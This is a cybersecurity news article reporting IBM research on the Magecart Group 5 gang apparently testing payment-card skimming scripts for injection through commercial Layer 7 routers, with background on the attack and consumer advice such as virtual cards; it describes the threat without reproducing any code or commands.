Home > Cyber News > New Skimming Trend: Injecting Malicious Scripts into Routers

New Skimming Trend: Injecting Malicious Scripts into Routers

Cybercriminals appear to be working on a new way to steal payment card data. According to IBM security researchers, a group of hackers is currently developing malicious scripts to use against commercial-grade Layer 7 (L7) routers.

This would entirely change the methods seen in skimming attacks such as Magecart, as up until now the malicious code used by hackers was delivered at website level via JavaScript or PHP files. Changing the attack surface can be regarded as an evolution in Magecart-powered attacks.

First of all, let’s see what exactly a Layer 7 router is. It is a type of commercial, heavy-duty router typical for large networks, government ones included. The difference to any other router is that a Layer 7 device is capable of manipulating traffic at the application level, also known as 7th level, of the OSI networking model. In other words, the router can respond to traffic not only according to the IP address but also cookies, domain names, browser types, etc.

So, what did IBM researchers uncover in their analysis?

The team has identified malicious activity which they attributed to the Magecart 5 cybercriminal group. The research shows that the Magecart hackers are “likely testing malicious code designed for injection into benign JavaScript files loaded by commercial grade Layer 7 routers, routersthat are typically used by airports, casinos, hotels and resorts”. The analyzed attack scenario reveals that the attack against this type of routers can allow malicious ad injection as well as access to other parts of the compromised network.

How would an attack against L7 routers happen?

These attacks are based on the idea that attackers would leverage L7 routers and abuse their traffic manipulation features to inject malicious scrips in the active browser sessions of users. In fact, IBM says that the Magecart group recently injected malicious code into an open source mobile slider module:

MG5 typically uses JavaScriptandhas likely injected its code into a JSlibrary served to mobile app developers. That open source code is provided as a free, MIT licensed tool designedto provide swiping features on mobile devices. By infecting that code at its source, MG5 can infect and compromise all the apps that incorporate that module into their codeand steal data from users who eventually download the booby-trapped apps.

Moreover, the scrips the researchers got hold of appeared to be specifically created to extract payment card details from online stores, and upload harvested information to a remote web server. It is curious to note that the scripts were uncovered because the attackers uploaded the files on VirusTotal, which was perhaps done for testing reasons to see whether the code would be detected by antivirus engines.

IBM discovered 17 such scripts, and grouped them in 5 sections according to their purpose.

Related: [wplinkpreview url=”https://sensorstechforum.com/magecart-skimming-code-javascript-library/”] Magecart Hackers Insert Skimming Code Into a Third-Party JavaScript Library

Researchers Looked into YARA Rules

The researchers looked into YARA rules (a tool that enables a rule-based approach to create descriptions of malware families based on textual or binary patterns) and IOC (indicator of compromise) associated with the Magecart group 5 activity. A VirusTotal alert from one of the analyzed Yara rules initially identified two un-obfuscated file samples that were very similar to samples shared in previous analyses of Magecart activity.

The experts noticed that these two samples, which shared a common naming convention, were identified as JavaScript skimming code. The recurring file naming convention, where the string “test4” repeated, also came from the same uploading member and source location in Murino, Russia, the report says.

What can users do to prevent these attacks?

Unfortunately, there’s not much a user can do to circumvent an attack at the router level. The only certain thing is to avoid shopping from suspicious online stores or public networks, like the ones in hotels, malls, and airports. Nonetheless, shopping from home also poses risks.

There’s still hope, as security researchers have been recommending something called a virtual card. This approach means that the user gets a one-payment card number used for one transaction only.

What is a virtual card? It is a prepaid credit card, which enables shopping freely online. The virtual card only features a number and doesn’t have a physical carrier. With this card users can rely on the security and protection of their online payments.

This means that even if the card number is used on a dangerous website, the card number is useless once the transaction is completed. The disadvantage of the virtual card is that it is still not widely available to users worldwide, and it may not be easy to get one.

The change in tactics of Magecart hackers in their skimming operations is not that surprising, as attacks at router level are not unseen. Insecure routers have been targeted in many attacks, such as phishing, cryptomining, and malware downloads.

In short, router security should not be overlooked. For keeping the router safe, you should check whether the router has a key or not. If you have not setup any key for the router, then you can do it by using the screen of the wireless security setup which is present in the router. There are other tips for router security that you should consider applying.

Milena Dimitrova

An inspired writer and content manager who has been with SensorsTechForum since the project started. A professional with 10+ years of experience in creating engaging content. Focused on user privacy and malware development, she strongly believes in a world where cybersecurity plays a central role. If common sense makes no sense, she will be there to take notes. Those notes may later turn into articles! Follow Milena @Milenyim

More Posts

Follow Me:

Leave a Comment

Your email address will not be published. Required fields are marked *

This website uses cookies to improve user experience. By using our website you consent to all cookies in accordance with our Privacy Policy.
I Agree